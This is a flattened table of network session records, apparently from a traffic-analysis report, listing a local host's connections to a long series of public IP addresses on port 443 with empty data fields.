                                          10877192.168.2.23589322.220.122.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10878192.168.2.2337292120.205.155.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10879192.168.2.234242848.129.53.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10880192.168.2.2343720101.71.5.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10881192.168.2.2333102204.103.118.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10882192.168.2.234339070.112.70.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10883192.168.2.2337976206.255.215.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10884192.168.2.2337086206.164.155.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10885192.168.2.2334054144.142.13.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10886192.168.2.235266446.120.161.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10887192.168.2.235627046.184.155.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10888192.168.2.2349438113.147.6.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10889192.168.2.23567085.201.3.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10890192.168.2.235150442.179.27.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10891192.168.2.234231227.4.165.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10892192.168.2.234853259.83.91.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10893192.168.2.23393208.5.78.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10894192.168.2.2345976210.85.139.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10895192.168.2.2339208167.154.126.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10896192.168.2.2351146128.133.123.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10897192.168.2.2359320147.211.215.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10898192.168.2.2346922189.251.206.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10899192.168.2.235493814.58.186.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10900192.168.2.2340750202.46.27.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10901192.168.2.234416066.203.95.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10902192.168.2.2336466192.231.224.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10903192.168.2.235873876.1.183.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10904192.168.2.234494664.175.94.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10905192.168.2.2360628182.223.123.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10906192.168.2.2350022161.194.192.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10907192.168.2.2345608198.124.121.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10908192.168.2.2358520112.245.130.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10909192.168.2.2358046118.125.199.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10910192.168.2.2340570195.11.9.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10911192.168.2.235940094.96.215.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10912192.168.2.2354124105.63.24.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10913192.168.2.2354658146.142.169.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10914192.168.2.2334334159.120.15.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10915192.168.2.2358406181.37.161.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10916192.168.2.2345358207.123.147.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10917192.168.2.233402224.156.231.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10918192.168.2.2360114195.68.181.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10919192.168.2.2356260183.251.133.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10920192.168.2.23402104.34.193.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10921192.168.2.235772868.72.90.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10922192.168.2.2334164203.17.162.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10923192.168.2.234926678.223.253.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10924192.168.2.2344624190.155.31.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10925192.168.2.2345220104.215.69.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10926192.168.2.2337160103.166.201.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10927192.168.2.2336620124.36.204.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10928192.168.2.234271067.128.175.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10929192.168.2.235940250.42.45.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10930192.168.2.2341166111.89.100.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10931192.168.2.233338877.112.125.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10932192.168.2.235728268.129.72.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10933192.168.2.2334882165.231.166.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10934192.168.2.2359012145.188.223.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10935192.168.2.235313419.187.19.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10936192.168.2.23410528.91.194.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10937192.168.2.235762693.178.175.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10938192.168.2.2337862165.138.123.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10939192.168.2.2349314105.173.179.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10940192.168.2.235210020.96.27.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10941192.168.2.235844475.135.79.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10942192.168.2.2334564205.167.227.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10943192.168.2.23534621.161.248.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10944192.168.2.234434244.234.124.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10945192.168.2.2356664170.86.250.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10946192.168.2.2356122194.101.140.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10947192.168.2.234642632.20.134.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10948192.168.2.2339130130.200.68.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10949192.168.2.234013897.181.197.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10950192.168.2.2339160189.150.169.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10951192.168.2.2347748203.38.129.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10952192.168.2.234652882.182.227.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10953192.168.2.2343756110.94.155.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10954192.168.2.2342962221.37.126.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10955192.168.2.2343682131.77.245.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10956192.168.2.2351112147.65.34.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10957192.168.2.234365650.171.49.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10958192.168.2.2346708179.245.156.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10959192.168.2.235286250.149.14.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10960192.168.2.2353972201.175.30.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10961192.168.2.234993471.195.13.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10962192.168.2.234195619.52.131.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10963192.168.2.2360464115.103.45.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10964192.168.2.234789466.240.114.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10965192.168.2.2346960176.47.179.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10966192.168.2.235785869.144.69.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10967192.168.2.235204861.199.220.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10968192.168.2.2344876223.110.46.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10969192.168.2.2338606194.187.253.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10970192.168.2.2334016183.86.42.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10971192.168.2.2358428123.3.51.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10972192.168.2.2334032105.241.35.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10973192.168.2.2344476140.214.171.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10974192.168.2.234643632.202.242.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10975192.168.2.2348872158.161.8.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10976192.168.2.2348868132.194.115.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10977192.168.2.2354704180.208.138.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10978192.168.2.2358228219.36.184.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10979192.168.2.234780823.123.245.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10980192.168.2.2359834124.54.247.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10981192.168.2.2350032116.32.42.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10982192.168.2.2333240196.117.157.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10983192.168.2.2357286208.135.95.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10984192.168.2.235484280.83.152.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10985192.168.2.2335826146.166.188.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10986192.168.2.2347648103.18.198.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10987192.168.2.235068884.140.160.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10988192.168.2.236046879.192.236.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10989192.168.2.234014031.242.203.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10990192.168.2.2352238113.45.26.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10991192.168.2.2347614161.236.209.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10992192.168.2.234887078.196.241.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10993192.168.2.2341944148.5.49.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10994192.168.2.236043662.50.75.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10995192.168.2.2342222121.233.199.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10996192.168.2.23501629.231.107.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10997192.168.2.2346404102.180.197.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10998192.168.2.235096014.233.186.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10999192.168.2.235617634.142.157.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11000192.168.2.2346776195.190.53.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11001192.168.2.2345384130.199.33.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11002192.168.2.2343086211.94.39.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11003192.168.2.235702837.22.59.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11004192.168.2.234249067.186.143.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11005192.168.2.233562079.153.102.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11006192.168.2.2356684173.185.132.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11007192.168.2.2350488152.85.171.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11008192.168.2.2349016168.167.10.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11009192.168.2.233338463.221.129.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11010192.168.2.2335166149.47.60.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11011192.168.2.2345864131.11.130.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11012192.168.2.234170662.228.122.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11013192.168.2.2356572202.80.58.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11014192.168.2.2357854187.250.192.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11015192.168.2.2349062188.190.154.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11016192.168.2.2347670149.27.224.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11017192.168.2.234063853.80.218.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11018192.168.2.2359216184.211.246.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11019192.168.2.2353788179.86.207.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11020192.168.2.233472067.47.25.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11021192.168.2.233768473.68.125.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11022192.168.2.2356206186.240.224.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11023192.168.2.235371657.205.3.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11024192.168.2.235872689.108.103.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11025192.168.2.2352062187.135.233.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11026192.168.2.235545479.253.142.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11027192.168.2.2347698144.221.177.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11028192.168.2.2343692191.46.117.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11029192.168.2.2334662163.105.216.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11030192.168.2.23564848.106.100.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11031192.168.2.2335566169.160.211.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11032192.168.2.235081881.11.237.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11033192.168.2.233291662.93.154.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11034192.168.2.234775066.77.148.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11035192.168.2.2351238220.81.74.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11036192.168.2.2356218151.76.162.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11037192.168.2.235973838.42.228.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11038192.168.2.2349628184.47.50.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11039192.168.2.2334216177.48.124.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11040192.168.2.2341448120.78.116.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11041192.168.2.2350310175.205.132.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11042192.168.2.2339020138.152.107.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11043192.168.2.234689623.184.23.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11044192.168.2.2358154122.220.169.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11045192.168.2.2352630173.155.252.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11046192.168.2.2338226191.167.132.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11047192.168.2.2335400196.24.200.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11048192.168.2.2350120218.224.107.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11049192.168.2.233470257.27.245.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11050192.168.2.2360108136.24.173.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11051192.168.2.2336906141.24.78.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11052192.168.2.235428614.128.4.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11053192.168.2.234949675.243.69.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11054192.168.2.2339904178.46.171.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11055192.168.2.2338164138.79.40.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11056192.168.2.234927686.160.115.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11057192.168.2.2342382222.36.1.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11058192.168.2.233432038.253.50.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11059192.168.2.234508017.142.102.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11060192.168.2.234554276.37.252.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11061192.168.2.2347102189.136.130.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11062192.168.2.2359388181.222.103.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11063192.168.2.2342546157.113.119.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11064192.168.2.2340328206.202.161.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11065192.168.2.234220462.179.50.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11066192.168.2.2336312161.147.58.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11067192.168.2.233963040.252.133.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11068192.168.2.2349194116.187.80.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11069192.168.2.2348798135.97.73.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11070192.168.2.234094268.168.182.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11071192.168.2.2360750123.235.51.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11072192.168.2.235686060.242.2.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11073192.168.2.2338358104.86.52.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11074192.168.2.2352266103.25.141.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11075192.168.2.23520721.156.67.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11076192.168.2.2345992172.126.109.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11077192.168.2.2349072175.77.183.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11078192.168.2.235510857.111.240.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11079192.168.2.234992690.217.100.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11080192.168.2.235014279.23.92.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11081192.168.2.234656851.62.240.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11082192.168.2.2333024133.167.178.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11083192.168.2.2333134169.83.18.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11084192.168.2.235147231.95.108.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11085192.168.2.2357810148.54.140.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11086192.168.2.2354670118.72.131.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11087192.168.2.2351082208.196.230.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11088192.168.2.2335398141.120.130.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11089192.168.2.2335242207.60.91.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11090192.168.2.2351900146.198.210.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11091192.168.2.234209253.216.23.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11092192.168.2.234342049.74.126.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11093192.168.2.2355278103.211.89.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11094192.168.2.2354464190.168.255.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11095192.168.2.2356128155.162.66.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11096192.168.2.235901282.240.245.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11097192.168.2.235068653.174.177.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11098192.168.2.2351624115.11.199.119443
                                          TimestampBytes transferredDirectionData


